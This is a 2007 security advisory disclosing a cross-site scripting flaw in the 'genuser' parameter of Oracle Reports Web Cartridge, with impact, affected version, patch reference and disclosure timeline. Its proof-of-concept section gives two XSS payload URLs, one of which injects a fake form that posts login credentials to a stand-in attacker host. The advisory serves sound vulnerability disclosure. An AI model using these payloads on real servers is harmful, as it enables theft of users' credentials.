<<< Date Index >>>     <<< Thread Index >>>

[ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS



=============================================
INTERNET SECURITY AUDITORS ALERT 2007-001
- Original release date: January 17, 2007
- Last revised: January 17, 2007
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.

II. BACKGROUND
-------------------------
The Reports Web CGI or Web Cartridge is required for the Reports
Server when using the Oracle Application Server (OAS) to process
report requests from Web clients.

III. DESCRIPTION
-------------------------
Improper validation in "genuser" parameter allows to inject arbitrary
code script/HTML that will be executed in the client browser.

This is specially serious in authentication forms where a malicious
user can obtain the credentials of authentication of other users.

IV. PROOF OF CONCEPT
-------------------------
URL original:
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>

This request return a page with an authentication form (with User
Name, Password, and Database fields).

With a POST method (the rwcgi60 accept both methods: GET and POST),
the user send:
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>

A malicious user can modify the value of the "genuser" parameter and
inject arbitrary script/HTML code:

-- Example 1 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User
Name<script>alert('Vulnerable to XSS attack!');</script>


--- Example 2 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form
name='AttackerForm'

action='http://attacker-machine.com/credentials'>User Name

V. BUSINESS IMPACT
-------------------------
An attacker can spoof the session of other authenticated users,
obtains his authentication credentials, or deface the authentication
form page.

VI. SYSTEMS AFFECTED
-------------------------
Oracle9i Application Server Release 2, version 9.0.2.3

VII. SOLUTION
-------------------------
The January 2007 CPU (Critical Patch Update) contain fixes for this
vulnerability.

VIII. REFERENCES
-------------------------
-
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
January   17, 2007:  Initial release

XI. DISCLOSURE TIMELINE
-------------------------
April     23, 2006: Vulnerability acquired by
                    Internet Security Auditors
April     24, 2006: Initial vendor notification sent.
April     29, 2006: Initial response of the vendor
January   16, 2007: The vendor fixed the vulnerability in the CPU.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security

Auditors, S.L. accepts no responsibility for any damage caused by the
use or misuse of this information.